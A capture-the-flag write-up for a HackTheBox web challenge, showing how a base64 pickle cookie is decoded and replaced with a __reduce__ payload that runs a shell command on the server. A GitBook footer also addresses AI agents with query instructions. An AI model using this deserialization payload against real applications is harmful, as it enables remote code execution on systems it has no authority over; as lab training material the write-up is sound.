> For the complete documentation index, see [llms.txt](https://xenon-2.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://xenon-2.gitbook.io/writeups/hackthebox/challenges/baby-website-rick.md).

# Baby Website Rick

We are presented with a web application that seems to point to some form of pickle deserialization attack from the start.

<figure><img src="/files/uzHbw9P0XgCrEINxjskg" alt=""><figcaption></figcaption></figure>

We can also see that a suspicious looking base64 string is encoded in the cookie, which seems to be a pickle object.

<figure><img src="/files/qphSBwbBkk0BtrWFkYea" alt=""><figcaption></figcaption></figure>

We can first try to decode the existing pickle object with `pickle.loads`, adding the appropriate `anti_pickle_serum` object.

```python
import pickle
import base64

data = 'KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwphbnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu'
class anti_pickle_serum(object):
    def __init__(self):
        return None
    
data =  pickle.loads(base64.b64decode(data))
print(data)
## OUTPUT
(12) ┌──(12)─(kali㉿kali)-[~/Desktop/CTF/Web/Baby Website Rick]
└─$ python2 decode.py 
{'serum': <__main__.anti_pickle_serum object at 0x7f8b351843d0>}
                
```

We can now craft our payload based on [this article ](https://davidhamann.de/2020/04/05/exploiting-python-pickle/), using the `__reduce__` attribute to place our malicious code.

After some trial and error, i realized that `os.system()` doesnt directly return my command output which is why i opted for `subprocess.check_output` as it captures the standard output of the external command as a string and returns it.

```python
import pickle
import base64
import subprocess
import os
class RCEStr(object):
    def __reduce__(self):
        #if output is not shown, can use subprocess.check_output as well
        return  (subprocess.check_output), (['cat','flag_wIp1b'],)
    
pickle_data = pickle.dumps({'serum': RCEStr()})
payload = base64.urlsafe_b64encode(pickle_data)
print(payload.decode('utf-8'))
```

<figure><img src="/files/genyLtsg0KuLDmFLavSE" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Pickle's Protocol might matter in this case as well as the version of python that you are using as I only got it to work with python2 and protocol 0.
{% endhint %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://xenon-2.gitbook.io/writeups/hackthebox/challenges/baby-website-rick.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.